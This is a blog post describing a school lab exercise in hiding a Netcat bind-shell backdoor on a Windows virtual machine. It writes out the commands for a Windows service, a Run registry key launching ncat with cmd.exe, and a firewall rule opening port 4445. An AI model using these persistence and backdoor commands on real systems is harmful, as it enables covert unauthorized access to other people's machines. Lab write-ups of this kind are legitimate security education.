Building a simple reverse shell on Windows with Netcat (Part 2)

Yannik Gartmann
4 min readOct 20, 2021

--

After understanding how we can set up a reverse shell using Netcat, following part one of this serie, let’s talk about how to hide the execution of our backdoor.

Photo by Muhannad Ajjan on Unsplash

Before executing any command, I highly recommend reading the documentation and understanding what you are performing. Some of the parameters and commands I’ll explain as we go on in this post.

I would like to point out whatever we are doing here was done as a school assignment using the virtual learning environment smartlearn.ch. Please, do not mess with productive systems! Always use a private learning environment! I’ll take no responsibility for damages on your system(s) or legal actions against you. So, please be careful :)

Using the power of Windows Service

(not working approach)

Windows services offer us the possibility to execute our Netcat command automatically and hidden from the user. Before we start, let’s look at the official Microsoft documentation New-Service (Microsoft.PowerShell.Management) — PowerShell | Microsoft Docs.

First, we want to use powershell.exe instead of cmd.exe for our connection. So swap the “-e cmd.exe” with “-e powershell.exe”. To continue, we need the exact installation location of Netcat. With the command “where ncat”, we get the path and save it for later use.

Let’s build our New-Service command, we need the following parameters:

  • -BinaryPathName ‘“C:\Program Files (x86)\Nmap\ncat.exe” -lnp 4445 -e powershell.exe’
  • -DisplayName “B@ckD00r”
  • -Name “hiddenbackdoor”
  • -StartupType “Automatic”
  • -Description “No one will know what I do with this name!”

Putting this all together we get the following command:

New-Service -BinaryPathName ‘“C:\Program Files (x86)\Nmap\ncat.exe” -lnp 4445 -e powershell.exe’ -DisplayName “B@ckD00r” -Name “4hiddenbackdoor” -StartupType “Automatic” -Description “No one will know what I do with this name!”

Conclusions using Windows Services

Unfortunately, this approach will not work when adding a service to be running as an Administrator.

In the screenshot you see, the first service will have no real privileges. The second service asks me to enter a password for the Administrator.

This approach wasn’t working for me. But…

Using Windows Registry

(working approach)

After searching a bit around what other approach we could use, I came across this article called 10 Steps to Use NetCat as a Backdoor in Windows 7 System (hacking-tutorial.com) and thought, let’s give it a try.

The author uses the Windows startup process to execute Netcat while Windows is logging in the user. This is an essential feature of Windows to allow, for example, Microsoft Teams, Discord and other applications to startup while you are logging in. Before we go on, make sure the currently active shell has admin privileges; if not, it will not work.

First, we want to set a new Key inside the directory “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”. with the command:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v hiddenbackdoor /d "C:\Program Files (x86)\Nmap\ncat.exe -lnp 4445 -e cmd.exe"

We have already extracted the installation location of Netcat in the previous chapter.

Now, let’s check on vmWP1 if the key was added to the registry. Yes it was!

The Netcat Command is executed when a user logs in now, but we currently don’t have access to the port remotely. We will fix this by opening port 4445 in the Windows firewall. With the following command, we add a rule to allow any TCP traffic to port 4445.

netsh advfirewall firewall add rule name="hiddenbackdoor" dir=in action=allow protocol=TCP localport=4445

Now, check if the port was added to the firewall.

Yes!

We are done. Restart the Windows machine vmWP1 and login from your attacker machine vmKL1.

Now we have full access to vmWP1 remotely without the users’ knowledge.

Conclusions using Windows Registry

This approach works well but still has a significant flow: The user will be greeted by a command window. When you close it, the connection gets dropped.

There might be a solution to this problem, but I couldn’t find it. Let me know in the commands :)

I hope you have enjoyed this post and have learned at least how important security is. Keep you and your networks safe :)

-Yannik

--

--

Yannik Gartmann

DevOps Engineer, Photographer, and Railway enthusiast.